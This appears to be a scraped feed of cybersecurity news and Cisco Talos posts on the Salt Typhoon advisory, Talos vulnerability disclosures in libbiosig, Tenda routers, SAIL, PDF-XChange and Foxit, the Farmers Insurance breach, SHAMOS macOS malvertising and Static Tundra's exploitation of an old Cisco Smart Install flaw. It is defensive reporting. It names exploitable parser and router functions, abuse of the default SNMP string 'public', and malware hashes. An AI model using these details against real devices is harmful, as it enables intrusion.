A coalition of international cybersecurity agencies led by the UK’s National Cyber Security Centre (NCSC) has publicly linked…

A coalition of international cybersecurity agencies led by the UK’s National Cyber Security Centre (NCSC) has publicly linked three China-based technology companies to a long-running global cyberattack campaign.

In a new advisory, the NCSC and partners from twelve other countries, the United States, Australia, Canada, New Zealand, the Czech Republic, Finland, Germany, Italy, Japan, the Netherlands, Poland and Spain shared technical details about a campaign that has targeted critical networks since at least 2021.

The attacks have impacted several high-profile organisations around the world in sectors like government, telecommunications, transportation, and military infrastructure. The data stolen could ultimately provide Chinese intelligence services with the ability to track communications and movements on a global scale.

****An Unrestrained Campaign****

According to the advisory (PDF), the three China-based companies, “Sichuan Juxinhe Network Technology Co Ltd,” “Beijing Huanyu Tianqiong Information Technology Co,” and “Sichuan Zhixin Ruijie Network Technology Co Ltd,” provide cyber-related services to China’s intelligence agencies.

NCSC chief executive Dr. Richard Horne expressed deep concern, stating that this activity is an “unrestrained campaign of malicious cyber activities on a global scale.” The campaign partially overlaps with a group commonly known as Salt Typhoon. Other groups linked to this campaign include the following:

*   RedMike
*   UNC5807
*   GhostEmperor
*   OPERATOR PANDA

A key finding, as per the US National Security Agency’s press release, is that the attackers have been successful not by using new or complex hacking tools, but by taking advantage of old, well-known vulnerabilities that organisations should have already fixed with security updates.

The campaign successfully exploited flaws in devices from major companies like Ivanti (CVE-2024-21887), Palo Alto Networks (CVE-2024-3400), and Cisco (CVE-2023-20273, CVE-2023-20198, and CVE-2018-0171).

This means that many of these attacks could have been easily avoided. Instead of developing new methods, the hackers simply exploit weaknesses that have been left unpatched.

****What Organisations Can Do****

Given the seriousness of the threat, the agencies are strongly urging organisations to take immediate action. They are advised to proactively look for malicious activity on their networks.

The advisory also provides a specific warning, including that organisations should gain a full understanding of the attackers’ presence before trying to remove them to ensure they can achieve a complete “eviction” from the network.

The advisory also points out the importance of guaranteeing that internet-facing devices are properly secured and that all available security updates are applied. As Dr. Horne emphasised, network defenders must remain vigilant and continuously review their systems for any signs of unusual activity.

****Expert Analysis****

John Hultquist, the Chief Analyst at Google’s Threat Intelligence Group, provided a statement exclusively to Hackread.com, offering further insight into the threat. He noted that the hacking group has a “unique advantage” in evading detection because of its deep expertise in telecommunications systems.

According to Hultquist, Chinese cyber espionage is powered by an “ecosystem of contractors, academics, and other facilitators” who are used to create tools and carry out the attacks. He explained that this model has allowed their operations to grow to an “unprecedented scale.”

Hultquist also highlighted that the reported targeting of hospitality and transportation sectors suggests a goal beyond corporate espionage: gathering information to “closely surveil individuals” and build a complete picture of who they are communicating with, their location, and where they travel.

UK and US Blame Three Chinese Tech Firms for Global Cyberattacks

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed ten vulnerabilities in BioSig Libbiosig, nine in Tenda AC6 Router, eight in SAIL, two in PDF-XChange Editor, and one in a Foxit PDF Reader.
The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed ten vulnerabilities in BioSig Libbiosig, nine in Tenda AC6 Router, eight in SAIL, two in PDF-XChange Editor, and one in a Foxit PDF Reader.

The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy.    

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

****Libbiosig vulnerabilities****

_Discovered by Mark Bereza and Lilith >\_> of Cisco Talos._

BioSig is an open source software library for biomedical signal processing. The aim of the BioSig project is to foster research in biomedical signal processing by providing free and open source software tools for many different application areas. BioSig for C/C++ provides command line tools for data conversion, a library to access a number of data formats (libbiosig), and some experimental code for network transfer of biosignal data.

Talos discovered ten vulnerabilities in libbiosig, affecting both version 3.9.0 of the stable release and the latest commit on the Master Branch at the time of disclosure to the vendor, grouped here by vulnerability type:

Integer overflow:

*   TALOS-2025-2231 (CVE-2025-53518) exists in the ABF parsing functionality. A specially crafted ABF file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.
*   TALOS-2025-2233 (CVE-2025-52581) exists in the GDF parsing functionality. A specially crafted GDF file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

Stack-based buffer overflow:

*   TALOS-2025-2234 (CVE-2025-54480-54494) and TALOS-2025-2236 (CVE-2025-46411) exist in the MFER parsing functionality. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

Heap-based buffer overflow:

*   TALOS-2025-2232 (CVE-2025-53853) exists in the ISHNE parsing functionality. A specially crafted ISHNE ECG annotations file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.
*   TALOS-2025-2235 (CVE-2025-53557) and TALOS-2025-2237 (CVE-2025-53511) exist in the MFER parsing functionality. A specially crafted MFER file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability. 
*   TALOS-2025-2239 (CVE-2025-54462) exists in the Nex parsing functionality. A specially crafted .nex file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.
*   TALOS-2025-2240 (CVE-2025-48005) exists in the RHS2000 parsing functionality. A specially crafted RHS2000 file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

Out-of-bounds read:

*   TALOS-2025-2238 (CVE-2025-52461) exists in the Nex parsing functionality. A specially crafted .nex file can lead to an information leak. An attacker can provide a malicious file to trigger this vulnerability.

****Tenda vulnerabilities****

_Discovered by Lilith >\_> of Cisco Talos._

The Tenda AC6 is a popular and affordable dual-band gigabit WiFi Router available online, especially on Amazon. All vulnerabilities were found in Tenda AC6 V5.0 V02.03.01.110.

TALOS-2025-2161 (CVE-2025-31355) is a firmware update vulnerability in the Firmware Signature Validation functionality of Tenda. A specially crafted malicious file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

Two unencrypted transmission of credentials vulnerabilities were found: TALOS-2025-2162 (CVE-2025-27564) exists in the web portal authentication functionality, while TALOS-2025-2167 (CVE-2025-31646) is in the Session Authentication Cookie functionality. Specially crafted network packets can lead to arbitrary authentication or authentication bypass, respectively. An attacker can sniff network traffic to trigger these vulnerabilities.

TALOS-2025-2163 (CVE-2025-24322) is an unsafe default authentication vulnerability in the Initial Setup Authentication functionality of Tenda. A specially crafted network request can lead to arbitrary code execution. An attacker can browse to the device to trigger this vulnerability.

TALOS-2025-2164 (CVE-2025-24496) is an information disclosure vulnerability in the /goform/getproductInfo functionality of Tenda. Specially crafted network packets can lead to a disclosure of sensitive information. An attacker can send packets to trigger this vulnerability.

TALOS-2025-2165 (CVE-2025-27129) is an authentication bypass vulnerability in the HTTP authentication functionality of Tenda. A specially crafted HTTP request can lead to arbitrary code execution. An attacker can send packets to trigger this vulnerability.

TALOS-2025-2166 (CVE-2025-30256) is a denial of service vulnerability in the HTTP Header Parsing functionality of Tenda. A specially crafted series of HTTP requests can lead to a reboot. An attacker can send multiple network packets to trigger this vulnerability.

TALOS-2025-2168 (CVE-2025-32010) is a stack-based buffer overflow vulnerability in the Cloud API functionality of Tenda. A specially crafted HTTP response can lead to arbitrary code execution. An attacker can send an HTTP response to trigger this vulnerability.

TALOS-2025-2178 (CVE-2025-31143) is a cleartext transmission vulnerability that exists in the Tenda App Router Authentication functionality of Tenda. An attacker can send information gleaned from sniffing network traffic to trigger this vulnerability, which can lead to arbitrary authentication.

****SAIL vulnerabilities****

_Discovered by a member of Cisco Talos._

SAIL is a format-agnostic image decoding library supporting all popular image formats. It provides a C/C++ API for end-users and works on Windows, macOS, and Linux platforms.

Talos found eight memory corruption vulnerabilities in SAIL Image Decoding Library v0.9.8.

TALOS-2025-2215 (CVE-2025-46407) exists in the BMPv3 Palette Decoding functionality. When loading a specially crafted .bmp file, an integer overflow can be made to occur which will cause a heap-based buffer to overflow when reading the palette from the image. These conditions can allow for remote code execution. An attacker will need to convince the library to read a file to trigger this vulnerability.

TALOS-2025-2216 (CVE-2025-32468) exists in the BMPv3 Image Decoding functionality. When loading a specially crafted .bmp file, an integer overflow can be made to occur when calculating the stride for decoding. Afterwards, this will cause a heap-based buffer to overflow when decoding the image which can lead to remote code execution. An attacker will need to convince the library to read a file to trigger this vulnerability.

TALOS-2025-2217 (CVE-2025-35984) exists in the PCX Image Decoding functionality. When decoding the image data from a specially crafted .pcx file, a heap-based buffer overflow can occur which allows for remote code execution. An attacker will need to convince the library to read a file to trigger this vulnerability.

TALOS-2025-2218 (CVE-2025-53510) exists in the PSD Image Decoding functionality. When loading a specially crafted .psd file, an integer overflow can be made to occur when calculating the stride for decoding. Afterwards, this will cause a heap-based buffer to overflow when decoding the image which can lead to remote code execution. An attacker will need to convince the library to read a file to trigger this vulnerability.

TALOS-2025-2219 (CVE-2025-53085) exists in the PSD RLE Decoding functionality. When decompressing the image data from a specially crafted .psd file, a heap-based buffer overflow can occur which allows for remote code execution. An attacker will need to convince the library to read a file to trigger this vulnerability.

TALOS-2025-2220 (CVE-2025-50129) exists in the PCX Image Decoding functionality. When decoding the image data from a specially crafted .tga file, a heap-based buffer overflow can occur which allows for remote code execution. An attacker will need to convince the library to read a file to trigger this vulnerability.

TALOS-2025-2221 (CVE-2025-52930) exists in the BMPv3 RLE Decoding functionality. When decompressing the image data from a specially crafted .bmp file, a heap-based buffer overflow can occur which allows for remote code execution. An attacker will need to convince the library to read a file to trigger this vulnerability.

TALOS-2025-2224 (CVE-2025-52456) exists in the WebP Image Decoding functionality. When loading a specially crafted .webp animation an integer overflow can be made to occur when calculating the stride for decoding. Afterwards, this will cause a heap-based buffer to overflow when decoding the image which can lead to remote code execution. An attacker will need to convince the library to read a file to trigger this vulnerability.

****PDF-XChange out-of-bounds read vulnerabilities****

_Discovered by KPC of Cisco Talos._

PDF-XChange Editor allows the creation, editing, manipulation, and conversion of PDF files, conforming to international ISO specifications for PDF files.

TALOS-2025-2171 (CVE-2025-27931) and TALOS-2025-2203 (CVE-2025-47152) are out-of-bounds read vulnerabilities in the EMF functionality of PDF-XChange Editor version 10.5.2.395. By using a specially crafted EMF file, an attacker could exploit these vulnerabilities to perform an out-of-bounds read, potentially leading to the disclosure of sensitive information.

****Foxit memory corruption vulnerability****

_Discovered by KPC of Cisco Talos._

Foxit PDF Reader is a popular free program for viewing, creating, and editing PDF documents. It is commonly used as an alternative to Adobe Acrobat Reader and has a widely used browser plugin available.

TALOS-2025-2202 (CVE-2025-32451) is a memory corruption vulnerability in Foxit Reader 2025.1.0.27937. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.

Libbiosig, Tenda, SAIL, PDF XChange, Foxit vulnerabilities

Farmers Insurance reports a breach affecting 1.1 million customers. Learn how the attack, linked to groups ShinyHunters and…

Farmers Insurance reports a breach affecting 1.1 million customers. Learn how the attack, linked to groups ShinyHunters and Scattered Spider, is part of a wider trend impacting companies via Salesforce.

Farmers Insurance has disclosed a significant data breach that impacted more than 1.1 million customers. The company confirmed that a third-party vendor was the target of a cyberattack, which resulted in the theft of sensitive personal information. Although the vendor’s name wasn’t released, several reports are connecting this incident to a larger series of cyberattacks against companies using the Salesforce customer relationship management platform.

Current status of the company’s website (Image credit: Hackread.com)

Farmers Insurance, a part of the Zurich Insurance Group, first learned of the unauthorized access on May 30, 2025, when the vendor detected suspicious activity. The compromised data included names, addresses, dates of birth, driver’s license numbers, and in some cases, the last four digits of Social Security numbers.

The breach is reported to have affected around 1,111,386 people across 10 states, including California, Washington D.C., Iowa, Maryland, Massachusetts, New York, New Mexico, North Carolina, Oregon, and Rhode Island. After an investigation, the company began sending notifications to affected individuals on August 22, 2025, and is offering two years of identity theft protection services at no cost.

This incident is part of a series of cyberattacks that have recently targeted the insurance industry and other businesses. Multiple outlets have linked the breach to a broad social engineering campaign related to Salesforce. This type of attack often involves hackers using deceptive phone calls, or “vishing,” to trick employees into giving them unauthorized access.

Cybersecurity firms, including Google’s Mandiant, have attributed some of the recent attacks on the insurance sector to a group known as Scattered Spider. However, the cybercrime group ShinyHunters has also claimed responsibility for the data theft, stating that they and Scattered Spider work together. These groups have reportedly been linked to several major incidents that have affected well-known companies in various industries, including Cisco and Allianz Life.

According to the group, Scattered Spider provides the initial access to a company’s systems, while ShinyHunters handles the exfiltration of stolen data and extortion demands. This trend is not isolated to the insurance sector.

The luxury brand Chanel recently announced that its own US database, which was part of a Salesforce environment, was breached.  Google also recently confirmed that one of its internal databases, which also used Salesforce, was breached by ShinyHunters in June.

These incidents emphasise the growing security concerns for all businesses that use the Salesforce platform and are targeted by these sophisticated social engineering tactics.

_“_With the supply chain now a growing target for cybercriminals, organizations that provide services to large enterprises – and handle regulated sensitive data on their behalf – must ensure appropriate security controls are in place to protect that data from threats,_“_ said Piyush Pandey, CEO at Pathlock.

_“_One of the key elements to address this is to implement robust access governance, including the ability to detect unauthorized access in real time – so that malicious activity can be identified and shut down before any data is exfiltrated,_“_ he advised.

ShinyHunters and Scattered Spider Linked to Farmers Insurance Data Breach

CrowdStrike reports COOKIE SPIDER using malvertising to spread SHAMOS macOS malware (a new variant of AMOS infostealer), stealing…

CrowdStrike reports COOKIE SPIDER using malvertising to spread SHAMOS macOS malware (a new variant of AMOS infostealer), stealing credentials, crypto wallets, and targeting 300+ environments.

Between June and August this year, macOS users looking for solutions to routine technical issues were targeted by a campaign run by the cybercrime group COOKIE SPIDER. The attackers purchased ads that appeared as legitimate help sites, but instead of offering real fixes, these sites instructed visitors to run a one-line command in Terminal. That command delivered SHAMOS, a new variant of the AMOS infostealer, onto their systems.

For your information, one-line installation command is a technique that cybercriminals increasingly prefer because it bypasses macOS Gatekeeper security checks, allowing the malware to install without triggering warnings. Previous malware attacks on macOS devices, especially the one carried out through Cuckoo Stealer and earlier AMOS variants, used the same approach.

According to cybersecurity researchers at CrowdStrike, who identified the COOKIE SPIDER’s malvertising campaign, it was a large-scale one which targeted more than 300 customer environments with victims in the US, UK, Japan, Canada, Italy, Mexico, China, and Colombia.

The success of the campaign depended heavily on keeping it simple. For example, a user searching for a common macOS fix, such as “macOS flush resolver cache”, was led to a promoted site, mac-safercom, that looked legitimate. The pages provided instructions that appeared helpful, but were designed to convince visitors to copy and run a malicious command.

One of the malicious search results (Image credit: CrowdStrike)

Among the instructions was a command for users to paste into Terminal, which downloaded a Bash script. The script captured the user’s password and then retrieved the SHAMOS payload from a remote server.

CrowdStrike’s blog post notes that once SHAMOS is running on an infected device, it checks systems for sensitive information like Keychain data to Apple Notes, browser credentials, and even cryptocurrency wallets.

The malware then saves everything in a ZIP archive for exfiltration. It can also download extra payloads, including a fake Ledger Live wallet app and a botnet module, making it an even bigger cybersecurity threat than it already is.

****Spreading SHAMOS****

The method of distributing SHAMOS was as important as the malware itself. Using malvertising gave them a steady flow of unsuspecting victims. In some cases, the ads appeared to be linked to legitimate businesses, such as an Australia-based electronics store, suggesting that the criminals were spoofing business identities to gain credibility.

This tactic allowed fake help domains like mac-safercom and rescue-maccom to appear trustworthy enough for users to follow their instructions. CrowdStrike also observed evidence of the malware placing a malicious property list (plist) file in the user’s LaunchDaemons directory. It also used repeated curl commands that suggested botnet activity.

****Not Just Malvertising****

Other than malvertising, researchers noted that the malware also exploited GitHub for exposure, including fake repositories posing as legitimate software projects to trick users into executing malicious commands. One example involved a fake iTerm2 repository with nearly identical instructions for downloading SHAMOS.

The malicious iTerm2 GitHub repository (Image credit: CrowdStrike)

“This campaign is clever. Threat actors are targeting less-technical users, profiled through searches for help with basic issues, and provide them step-by-step guidance on how to install their malware,” noted Trey Ford, Chief Strategy and Trust Officer at Bugcrowd, a San Francisco, Calif.-based crowdsourced cybersecurity platform.

“This kind of attack is probably effective against the SMB and home user segment. I would expect that enterprises, the kind that use CrowdStrike offerings, would have malicious installations like this blocked through their privileged account management (PAM) software,” he said.

This campaign shows macOS devices are not safe from malware attacks. Therefore, use search engines but click on their results at your own risk. The most reliable way to check if a link is malicious is to use a trusted antivirus browser extension that scans URLs before you open them, or to scan the site with VirusTotal before visiting.

COOKIE SPIDER’s Malvertising Drops New SHAMOS macOS Malware

Amy (ahem, Special Agent Dale Cooper) shares lessons from their trip to the Olympic Peninsula and cybersecurity travel tips for your last-minute adventures.

Thursday, August 21, 2025 14:00

(Welcome to this week’s edition of the Threat Source newsletter.) 

Diane, 

2:01 p.m., August 21st. I’ve just returned from a remarkable journey through Seattle and the misty roads of the Olympic Peninsula. If you ever find yourself driving beneath those towering Douglas firs or dragged by your partner through the Twilight Museum in Forks, I recommend stopping for a cup of hot, black coffee and a slice of cherry pie at any roadside diner. It’s nothing short of extraordinary.  

But as I navigated the Rialto Beach tidepools (at 5:30 a.m., no less) and moss-laden trees of the Hoh Rainforest, I made a classic misstep: I forgot to connect to Wi-Fi the entire trip. By the time I returned, my high-speed data allowance had vanished into the mist, leaving me puzzled and restarting my cell phone for days — a humbling reminder that even seasoned agents can overlook the basics. 

Travel is a curious thing, Diane. When you’re on the road, it’s easy to let your guard down, become enchanted by the scenery and forget that digital dangers can lurk behind every public WiFi signal or seemingly harmless USB charging station. 

As the summer draws to a close and more people venture out of Twin Peaks for those last-minute adventures, I’ve compiled a list of field-tested precautions for the journey ahead, because even professionals need a reminder sometimes: 

1.  Update your devices and back up important data before you leave. If a device is lost, stolen or infected with malware, you’ll still have access to your files. 
2.  Turn off auto-connect features to reduce the risk of connecting to rogue networks or devices. 
3.  Only take what you need. The fewer devices you take, the fewer you have to keep track of and worry about. 
4.  Limit the use of location services on your devices and apps unless necessary. This protects your privacy and reduces the risk of targeted attacks while traveling. 
5.  Steer clear of public computers in hotel lobbies and libraries, especially for accessing sensitive accounts. If you must use them — or if you log in to any streaming services during your stay —  don't forget to log out of your accounts. 
6.  Public WiFi is convenient, but we know its security can be questionable. Use a VPN or your phone’s hotspot for a more secure connection. 
7.  Set up device tracking (like Find My iPhone or Find My Device) and know how to remotely wipe your device in case it’s lost or stolen. 
8.  Take a power bank with you to avoid using USB charging stations, which could result in malware being downloaded to your device. 

Diane, the woods are lovely, dark and deep, and so are the digital trails we leave behind. Stay vigilant, stay caffeinated and remember that the best protection is awareness. 

Special Agent Dale Cooper

**The one big thing **

Static Tundra, a Russian state-backed group, is exploiting end-of-life and unpatched Cisco network devices using a seven-year-old patched vulnerability (CVE-2018-0171) to steal data and maintain long-term hidden access in organizations worldwide. Their tactics include persistent implants and bespoke SNMP tools to exfiltrate data and maintain undetected access, with a focus on entities of strategic interest to the Russian government. We urge immediate patching or disabling of at-risk features to prevent compromise. 

**Why do I care? **

If your organization uses Cisco devices that haven’t been patched or replaced, you could be vulnerable to undetected cyberattacks and data breaches—even if the vulnerability is years old. This risk affects organizations of all sizes and industries, putting sensitive data and business operations in jeopardy. 

**So now what? **

Immediately review your network infrastructure for unpatched or end-of-life Cisco devices and apply available patches or disable vulnerable features as recommended. Ongoing security hardening, regular updates and vigilant monitoring are critical to defend against this and similar state-sponsored threats.

**Top security headlines of the week **

**Workday Data Breach Bears Signs of Widespread Salesforce Hack**   
Workday said threat actors gained access to a third-party customer relationship management (CRM) system and obtained “commonly available business contact information” such as names, phone numbers, and email addresses. (SecurityWeek) 

**Novel 5G Attack Bypasses Need for Malicious Base Station**   
A team of researchers from the Singapore University of Technology and Design released a framework named Sni5Gect that can be used to sniff messages and perform message injection in 5G communications. (SecurityWeek) 

**Internet-wide Vulnerability Enables Giant DDoS Attacks**   
Researchers from Tel Aviv University have identified a way around the Rapid Reset fix called "MadeYouReset," and it's raising the possibility that attackers could enact cyberattacks against up to one-third of all websites globally. (Dark Reading) 

**Threat Actors Allegedly Listed Windows Zero-Day RCE Exploit For Sale on Dark Web**   
The threat actor claims it targets fully updated Windows 10, Windows 11, and Windows Server 2022 systems. The sale conditions emphasize exclusivity, prohibiting resale unless explicitly negotiated, which is typical for premium exploits. (Cybersecurity News) 

**XenoRAT malware campaign hits multiple embassies in South Korea**    
The targets were generally European embassies in Seoul and the themes included fake meeting invites, official letters, and event invitations, often sent from impersonated diplomats. (BleepingComputer)

**Can’t get enough Talos? **

**The art of controlling information**   
JJ Cummings leads Talos' Threat Intelligence and Interdiction team on nation-state security and intelligence. He shares his story, thoughts on burnout and motivation, and advice for anyone looking to join Talos.

**Ransomware incidents in Japan during the first half of 2025**   
In the first half of 2025, the number of ransomware attacks in Japan increased by approximately 1.4 times compared to the previous year. Read our blog to learn the most recent trends.

**Cyber Analyst Series: Cybersecurity overview and the role of the cybersecurity analyst**   
A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages).

**Upcoming events where you can find Talos **

*   BlueTeamCon (Sept. 4 – 7) Chicago, IL 
*   LABScon (Sept. 17 – 20) Scottsdale, AZ 
*   VB2025 (Sept. 24 – 26) Berlin, Germany 

**Most prevalent malware files from Talos telemetry over the past week**

**SHA256: 47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca**     
MD5: 71fea034b422e4a17ebb06022532fdde      
VirusTotal: https://www.virustotal.com/gui/file/47ecaab5cd6b26fe18d9759a9392bce81ba379817c53a3a468fe9060a076f8ca/details  
Typical Filename: VID001.exe      
Claimed Product: N/A      
Detection Name: Coinminer:MBT.26mw.in14.Talos  

**SHA 256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**    
MD5: 2915b3f8b703eb744fc54c81f4a9c67f    
VirusTotal: https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507     
Typical Filename: VID001.exe    
Claimed Product: N/A    
Detection Name: Win.Worm.Coinminer::1201 

**SHA 256: 41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610**    
MD5: 85bbddc502f7b10871621fd460243fbc     
VirusTotal: https://www.virustotal.com/gui/file/41f14d86bcaf8e949160ee2731802523e0c76fea87adf00ee7fe9567c3cec610/details    
Typical Filename: N/A    
Claimed Product: Self-extracting archive    
Detection Name: Win.Worm.Bitmin-9847045-0 

**SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91**      
MD5: 7bdbd180c081fa63ca94f9c22c457376    
VirusTotal: https://www.virustotal.com/gui/file/a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91/details    
Typical Filename: IMG001.exe    
Detection Name: Simple\_Custom\_Detection    

**SHA 256: 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa**    
MD5: df11b3105df8d7c70e7b501e210e3cc3    
VirusTotal: https://www.virustotal.com/gui/file/59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa/details    
Typical Filename: DOC001.exe    
Claimed Product: N/A    
Detection Name: Win.Worm.Coinminer::1201

Cherry pie, Douglas firs and the last trip of the summer

FBI and Cisco warn Russian hackers are exploiting a 7-year-old Cisco Smart Install vulnerability on outdated routers and…

FBI and Cisco warn Russian hackers are exploiting a 7-year-old Cisco Smart Install vulnerability on outdated routers and switches worldwide.

Thousands of outdated Cisco devices that no longer receive security updates are now being exploited in a cyber espionage campaign, according to joint warnings from the FBI and Cisco Talos.

A Russian state-sponsored group known as Static Tundra, also tracked as Dragonfly, Energetic Bear and Berserk Bear, is taking advantage of a seven-year-old vulnerability that many organizations never patched.

The flaw, CVE-2018-0171, affects Cisco’s Smart Install feature and allows attackers to execute code or crash a device. Cisco addressed it back in 2018, but many systems remain unprotected either because they were never updated or have reached end-of-life (EOL) and no longer receive patches. Those devices, widely used in telecommunications, manufacturing and higher education, have become an easy entry point for one of Russia’s most persistent intelligence units.

Back in April 2018, Hackread.com reported that attackers exploited CVE-2018-0171 to target Cisco switches in data centers in Iran and Russia. By abusing the Smart Install feature, they hijacked the devices and replaced the IOS image with one displaying the US flag.

Screenshot from April 2018 showing an exploited Cisco switch displaying an ASCII US flag with the message “Don’t mess with our elections” after attackers replaced its IOS image. (Credit: Hackread.com)

Static Tundra is linked to Russia’s Federal Security Service (FSB) Center 16 and has been active for more than a decade. Researchers say the group has developed automation tools to scan the internet, often using services like Shodan and Censys, to identify targets still running Smart Install.

Once breached, they pull device configurations that often contain administrator credentials and details about wider network infrastructure, providing a launchpad for deeper compromises.

The FBI says it has already seen configuration data exfiltrated from thousands of US. devices across critical infrastructure sectors. In some cases, the attackers changed device settings to keep their access to the networks, showing particular interest in systems that help run industrial equipment and operations.

Static Tundra has a history of deploying SYNful Knock, a malicious implant for Cisco routers, first documented in 2015. This implant survives reboots and allows remote access through specially developed packets. In addition, the group abuses insecure SNMP community strings, sometimes even default ones like “public,” to extract more data or push new commands onto devices.

Cisco Talos researchers describe the operation as “highly sophisticated,” with evidence that compromised devices remain under the attackers’ control for years. They warn that Russia is not the only country running such operations, meaning any organization with unpatched or outdated networking gear could be at risk from multiple state actors.

“This FBI Alert underscores the importance of both maintaining a current inventory (knowing what’s available to attackers), and how important continued vigilance of patching currency and configuration management remains until the device is taken offline,” said Trey Ford, Chief Strategy and Trust Officer at Bugcrowd, a San Francisco, Calif.-based leader in crowdsourced cybersecurity.

“The impacted CVE (CVE-2018-0171) is a high scoring RCE (remote code execution) exploit – while some environments (like manufacturing, telecommunications, and other critical infrastructure) may face production delays for planned patching cycles – seeing a seven year delay for this kind of vulnerability to be widely exploited is a bit surprising,” he added.

****PATCH, PATCH, PATCH****

Both the FBI and Cisco have issued strong recommendations. Organizations should immediately patch devices still running Smart Install or disable the feature if patching is no longer an option.

For older, unsupported hardware, Cisco advises planning for replacement, since these devices will never receive fixes. Cybersecurity administrators should monitor for suspicious configuration changes, unusual SNMP traffic, and unexplained TFTP activity, which are common signs of this campaign.

The FBI is also encouraging anyone who suspects their systems may have been targeted to report findings through the Internet Crime Complaint Center.

Russian State Hackers Exploit 7-Year-Old Cisco Router Vulnerability

In the past year, "Static Tundra," aka "Energetic Bear," has breached thousands of end-of-life Cisco devices unpatched against a 2018 flaw, in a campaign targeting enterprises and critical infrastructure.

FBI, Cisco Warn of Russian Attacks on 7-Year-Old Flaw

A Russian state-sponsored cyber espionage group known as Static Tundra has been observed actively exploiting a seven-year-old security flaw in Cisco IOS and Cisco IOS XE software as a means to establish persistent access to target networks.
Cisco Talos, which disclosed details of the activity, said the attacks single out organizations in telecommunications, higher education and manufacturing

FBI Warns FSB-Linked Hackers Exploiting Unpatched Cisco Devices for Cyber Espionage

A Russian state-sponsored group, Static Tundra, is exploiting an old Cisco IOS vulnerability to compromise unpatched network devices worldwide, targeting key sectors for intelligence gathering.

Wednesday, August 20, 2025 09:00

*   **Static Tundra is a Russian state-sponsored cyber espionage group** linked to the FSB's Center 16 unit that has been operating for over a decade, specializing in compromising network devices for long-term intelligence gathering operations.
*   **The group actively exploits a seven-year-old vulnerability (CVE-2018-0171),** which was patched at the time of the vulnerability publications, in Cisco IOS software's Smart Install feature, targeting unpatched and end-of-life network devices to steal configuration data and establish persistent access.
*   **Primary targets include organizations in telecommunications, higher education and manufacturing sectors** across North America, Asia, Africa and Europe, with victims selected based on their strategic interest to the Russian government.
*   **Static Tundra employs sophisticated persistence techniques** including the historic SYNful Knock firmware implant (first reported in 2015) and bespoke SNMP tooling to maintain undetected access for multiple years.
*   **The threat extends beyond Russia's operations** — other state-sponsored actors are likely conducting similar network device compromise campaigns, making comprehensive patching and security hardening critical for all organizations.
*   **Threat actors will continue** to abuse devices which remain unpatched and have Smart Install enabled.
*   Customers are urged to apply the patch for CVE-2018-0171 or to disable Smart Install as indicated in the advisory if patching is not an option. Customer support is available if needed by initiating a TAC request.

Since 2015, Cisco Talos has observed the compromise of unpatched and often end-of-life Cisco networking devices by a highly sophisticated threat actor. Based on sufficient recent activity observed through our ongoing analysis, we have designated this threat cluster “Static Tundra.” This blog highlights our observations regarding this threat actor and provides recommendations for detecting and preventing activities associated with Static Tundra.

**Threat actor and campaign overview**

Talos assesses with high confidence that Static Tundra is a Russian state-sponsored cyber espionage group specializing in network device exploitation to support long-term intrusion campaigns into organizations that are of strategic interest to the Russian government. Static Tundra is likely a sub-cluster of another group, “Energetic Bear” (aka BERSERK BEAR), based on an overlap in tactics, techniques and procedures (TTPs) and victimology, which has been corroborated by the FBI. Energetic Bear was linked to the Russian Federal Security Service’s (FSB) Center 16 unit in a 2022 U.S. Department of Justice indictment. Talos also assesses with moderate confidence that Static Tundra is associated with the historic use of “SYNful Knock,” a malicious implant installed on compromised Cisco devices publicly reported in 2015.

Static Tundra is assessed to be a highly sophisticated cyber threat actor that has operated for over a decade, conducting long-term espionage operations. Static Tundra specializes in network intrusions, demonstrated by the group's advanced knowledge of network devices and use of bespoke tooling, possibly including the novel, but now decade-old, SYNful Knock router implant.

Static Tundra targets unpatched, and often end-of-life, network devices to establish access on primary targets and support secondary operations against related targets of interest. Once they establish initial access to a network device, Static Tundra will pivot further into the target environment, compromising additional network devices and establishing channels for long-term persistence and information gathering. This is demonstrated by the group’s ability to maintain access in target environments for multiple years without being detected.

For years, Static Tundra has been compromising Cisco devices by exploiting a previously disclosed vulnerability in the Smart Install feature of Cisco IOS software and Cisco IOS XE software (CVE-2018-0171) that has been left unpatched, often after those devices are end-of-life. We assess that the purpose of this campaign is to compromise and extract device configuration information en masse, which can later be leveraged as needed based on then-current strategic goals and interests of the Russian government. This is demonstrated by Static Tundra’s adaptation and shifts in operational focus as Russia’s priorities have changed over time.

